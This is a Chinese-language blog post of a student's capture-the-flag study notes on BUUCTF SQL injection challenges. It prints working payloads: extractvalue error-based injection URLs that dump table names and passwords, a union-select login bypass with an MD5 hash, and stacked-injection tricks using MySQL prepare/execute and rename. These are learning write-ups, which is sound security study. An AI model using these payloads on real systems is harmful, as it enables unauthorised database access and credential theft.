寒假第二週知識點彙總

一：【buuctf】 baby sql

二：【buuctf】 hard sql

報錯注入：報錯注入在網上查詢到了十種型別，鏈結放在這裡了，以後去了解，報錯注入的原理講解目前看不懂（2021/1/16），現在常用的報錯注入看網上很多人的部落格只有三種出現次數最多：floor(),extractvalue(),updatexml()。我個人目前還是只學會了extractvalue()。

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('h4rdsq1')))))%23
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.h4rdsq1))))%23

這些是一直到報資料的**，但寫到這裡發現，flag只出來一部分，然後查閱資料，用left 和right 分別查一下，再拼接到一起就算是flag了。

三：【buu平台】[gxyctf2019]babysqli

在web學習的時候越來越多的看見了misc的影子，這個題給了一串編碼，經驗去解，32&64。

在聯合查詢並不存在的資料時，聯合查詢就會構造乙個虛擬的資料。

這個題還有乙個考點是資料庫在儲存資料的時候會加密，這個題是md5加密的，所以自己構造的密碼也要加密再放進去。

name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70' %23 &pw=123

這個**一放進去就直接得到flag了。

四：【buu平台】強網杯2019 隨便注

堆疊注入：在sql中，分號是用來表示一條sql語句的結束。如果在 ; 結束乙個sql語句後繼續構造下一條語句，效果就是分別執行兩條sql語句。由於兩條語句堆疊在同一行，而不是原本應該各自佔據一行，所以這種注入成為堆疊注入。

沒有以往的顯示位，用show來顯示出資訊。

數字作為表名的時候為了讓語句將他識別為乙個字元而不是int型別的資料，用反引號括起來。

這個題後面兩個思路。

產生兩個思路的原因：過濾了select等語句。

第一種思路是想辦法不讓他過濾select，我就要用聯合查詢去查你，讓你爆出flag。另一種是你不讓我在這個地方看，我就轉移到別的地方去看。

第一種的知識點：mysql預處理命令

prepare sqla from '[my sql sequece]';  	 預定義sql語句
execute sqla; 執行預定義sql語句
(deallocate || drop) prepare sqla; 刪除預定義sql語句
通過變數進行傳遞
set @tn = 'flag'; 儲存表名
set @sql = concat('select * from ', @tn); 儲存sql語句
prepare sqla from @sql; 預定義sql語句
execute sqla; 執行預定義sql語句
(deallocate || drop) prepare sqla; 刪除預定義sql語句
prepare語句準備好一條sql語句，並分配給這條sql語句乙個名字供之後呼叫。
準備好的sql語句通過execute命令執行，通過deallocate prepare命令釋放掉。

第二種的知識點：rename改變名字，將flag所在表的名字和列名轉換為一開始就顯示的那乙個。

寒假第二週知識點彙總

第二週知識點要點總結CSS

套裝二《知識點彙總》

一周知識點回顧

寒假第二週知識點彙總

第二週知識點要點總結CSS

套裝二《知識點彙總》

一周知識點回顧

相關推薦